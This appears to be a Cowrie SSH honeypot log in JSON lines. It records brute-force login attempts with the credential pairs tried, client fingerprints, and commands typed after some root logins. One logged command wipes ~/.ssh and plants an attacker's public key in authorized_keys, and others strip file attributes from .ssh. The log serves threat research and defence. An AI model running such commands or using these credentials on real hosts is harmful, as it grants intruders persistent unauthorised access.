{"eventid":"cowrie.session.closed","duration":12.77099084854126,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:35:02.955434Z","src_ip":"212.227.125.160","session":"84d615a51a7a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":57420,"dst_ip":"1.2.3.4","dst_port":22,"session":"180d527cac1e","protocol":"ssh","message":"New connection: 134.199.174.250:57420 (1.2.3.4:22) [session: 180d527cac1e]","sensor":"my-vps","timestamp":"2025-09-08T13:35:15.786887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:35:15.787866Z","src_ip":"134.199.174.250","session":"180d527cac1e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:35:16.093050Z","src_ip":"134.199.174.250","session":"180d527cac1e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567890","message":"login attempt [ftpuser/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:35:17.485432Z","src_ip":"134.199.174.250","session":"180d527cac1e"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:35:18.785264Z","src_ip":"134.199.174.250","session":"180d527cac1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53200,"dst_ip":"1.2.3.4","dst_port":22,"session":"18a195d93772","protocol":"ssh","message":"New connection: 212.227.235.229:53200 (1.2.3.4:22) [session: 18a195d93772]","sensor":"my-vps","timestamp":"2025-09-08T13:35:40.743410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:35:40.850748Z","src_ip":"212.227.235.229","session":"18a195d93772"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:35:40.953867Z","src_ip":"212.227.235.229","session":"18a195d93772"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"password123","message":"login attempt [sshd/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:35:41.459143Z","src_ip":"212.227.235.229","session":"18a195d93772"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:35:42.564611Z","src_ip":"212.227.235.229","session":"18a195d93772"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44802,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8077229d74c","protocol":"ssh","message":"New connection: 134.199.174.250:44802 (1.2.3.4:22) [session: a8077229d74c]","sensor":"my-vps","timestamp":"2025-09-08T13:35:45.663762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:35:45.664428Z","src_ip":"134.199.174.250","session":"a8077229d74c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:35:45.961500Z","src_ip":"134.199.174.250","session":"a8077229d74c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password1","message":"login attempt [ftpuser/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:35:47.001308Z","src_ip":"134.199.174.250","session":"a8077229d74c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:35:48.404522Z","src_ip":"134.199.174.250","session":"a8077229d74c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42052,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fc6ffdbca6a","protocol":"ssh","message":"New connection: 212.227.235.229:42052 (1.2.3.4:22) [session: 5fc6ffdbca6a]","sensor":"my-vps","timestamp":"2025-09-08T13:35:56.445359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:35:56.446295Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:35:56.575225Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe!@#123","message":"login attempt [root/qwe!@#123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:35:57.135131Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:35:57.410565Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:35:57.411457Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:35:57.412325Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:35:57.542442Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56568,"dst_ip":"1.2.3.4","dst_port":22,"session":"60cec00815c6","protocol":"ssh","message":"New connection: 212.227.235.229:56568 (1.2.3.4:22) [session: 60cec00815c6]","sensor":"my-vps","timestamp":"2025-09-08T13:35:57.565173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:35:57.568020Z","src_ip":"212.227.235.229","session":"60cec00815c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:35:57.797354Z","src_ip":"212.227.235.229","session":"60cec00815c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:35:57.895123Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:35:57.895849Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:35:58.025869Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:35:58.026770Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42060,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6c397d7644c","protocol":"ssh","message":"New connection: 212.227.235.229:42060 (1.2.3.4:22) [session: d6c397d7644c]","sensor":"my-vps","timestamp":"2025-09-08T13:35:58.147117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:35:58.148095Z","src_ip":"212.227.235.229","session":"d6c397d7644c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:35:58.274307Z","src_ip":"212.227.235.229","session":"d6c397d7644c"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"2025","message":"login attempt [odoo/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:35:58.707401Z","src_ip":"212.227.235.229","session":"60cec00815c6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:35:58.775888Z","src_ip":"212.227.235.229","session":"d6c397d7644c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:35:59.903252Z","src_ip":"212.227.235.229","session":"d6c397d7644c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:35:59.943286Z","src_ip":"212.227.235.229","session":"60cec00815c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42064,"dst_ip":"1.2.3.4","dst_port":22,"session":"8441e17c5259","protocol":"ssh","message":"New connection: 212.227.235.229:42064 (1.2.3.4:22) [session: 8441e17c5259]","sensor":"my-vps","timestamp":"2025-09-08T13:36:00.022804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:36:00.023798Z","src_ip":"212.227.235.229","session":"8441e17c5259"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:36:00.144668Z","src_ip":"212.227.235.229","session":"8441e17c5259"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:36:00.667408Z","src_ip":"212.227.235.229","session":"8441e17c5259"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:00.789009Z","src_ip":"212.227.235.229","session":"8441e17c5259"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:00.791994Z","src_ip":"212.227.235.229","session":"5fc6ffdbca6a"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":21671,"dst_ip":"1.2.3.4","dst_port":22,"session":"3afde87f2265","protocol":"ssh","message":"New connection: 49.247.35.31:21671 (1.2.3.4:22) [session: 3afde87f2265]","sensor":"my-vps","timestamp":"2025-09-08T13:36:06.134197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:36:06.138972Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:36:06.418303Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.login.success","username":"root","password":"Qazwsx123456!@#$%^","message":"login attempt [root/Qazwsx123456!@#$%^] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:36:07.519189Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:36:08.117203Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:36:08.117878Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:36:08.119181Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:36:08.398366Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:36:09.051052Z","src_ip":"49.247.35.31","session":"3afde87f2265"}
